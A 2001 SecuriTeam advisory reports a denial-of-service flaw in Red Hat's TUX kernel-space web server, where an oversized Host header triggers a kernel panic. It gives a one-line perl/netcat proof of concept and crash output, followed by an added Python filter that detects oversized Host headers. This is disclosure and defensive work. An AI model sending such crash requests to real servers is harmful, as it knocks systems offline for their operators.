[UNIX] TUX HTTPD Denial of Service Condition (Large Host)
From: support@securiteam.com
Date: 11/05/01
From: support@securiteam.com
To: list@securiteam.com
Subject: [UNIX] TUX HTTPD Denial of Service Condition (Large Host)
Message-Id: <20011105081235.C8D2E138BF@mail.der-keiler.de>
Date: Mon, 5 Nov 2001 09:12:35 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
TUX HTTPD Denial of Service Condition (Large Host)
------------------------------------------------------------------------
SUMMARY
<http://www.redhat.com/docs/manuals/tux/> Tux is a Kernel-Space HTTP
server coded for optimal performance (IRQ Affinity, HTTP Compression,
direct scatter-gather DMA etc.) and is meant to be used as the main HTTP
server for static objects with requests for dynamic content being passed
to a user-space HTTPD server such as Apache on the same box when necessary. A
security vulnerability in the product allows crashing of the server by
sending the server a large Host parameter inside a valid HTTP GET request.
DETAILS
Vulnerable systems:
RedHat Linux 7.2:
 * Kernel(s) 2.4.7-10 and 2.4.9-7
 * TUX-2.1.0-2.
The TUX web server is disabled by default.
It is possible to cause a denial of service condition by submitting an
oversized "Host:" header request to the Tux daemon causing an assertion
failure and eventual Kernel Panic. A total system reboot is required to
return the box to full functionality. For example the following script:
perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 .
qq(\n)" |nc 80
Will cause the affected box to crash with the below output (edited for
brevity):
Code: Bad EIP Value.
(0)Kernel Panic: Aiee, killing interrupt handler!
In interrupt handler - not syncing!
Despite being able to affect the contents of the EIP register, it seems
this vulnerability cannot be utilized to provide for a remote root
compromise.
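
A defensive check for the condition described above, as an added example that is not part of the original advisory or of TUX: a Python pre-filter, of the kind a fronting proxy or log-review script might apply, that flags requests carrying an oversized Host header. The 255-byte limit, the function names and the sample requests are assumptions constructed for illustration.

```python
# Added example: flag HTTP requests whose Host header is oversized.
# MAX_HOST_LEN is an assumed policy value, not a limit taken from the advisory.
MAX_HOST_LEN = 255  # DNS names are at most 253 characters; leaves room for ":port"


def host_values(raw: bytes) -> list[bytes]:
    """Return every Host header value found in the request head.

    Accepts both CRLF and bare LF line endings, and a head that is not
    terminated by a blank line, because the request shown in the advisory
    uses bare LF and has no terminating blank line.
    """
    head = raw.replace(b"\r\n", b"\n").split(b"\n\n", 1)[0]
    values = []
    for line in head.split(b"\n")[1:]:  # skip the request line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"host":  # header names are case-insensitive
            values.append(value.strip())
    return values


def check_request(raw: bytes, limit: int = MAX_HOST_LEN) -> str:
    """Classify a raw request as 'ok', 'oversized-host' or 'duplicate-host'."""
    values = host_values(raw)
    if any(len(v) > limit for v in values):
        return "oversized-host"
    if len(values) > 1:
        return "duplicate-host"
    return "ok"


# Constructed sample requests (not captured traffic).
SAMPLES = {
    "normal": b"GET / HTTP/1.0\r\nAccept: */*\r\nHost: www.example.com\r\n\r\n",
    "long-host": b"GET / HTTP/1.0\nAccept: */*\nHost: " + b"A" * 6000 + b"\n",
    "two-hosts": b"GET / HTTP/1.1\r\nHost: a.example\r\nhost: b.example\r\n\r\n",
}

if __name__ == "__main__":
    for label, request in SAMPLES.items():
        print(f"{label}: {check_request(request)}")
```
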
ADDITIONAL INFORMATION
The information has been provided by <mailto:a.orawe@ntlworld.com> Aiden
ORawe.
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.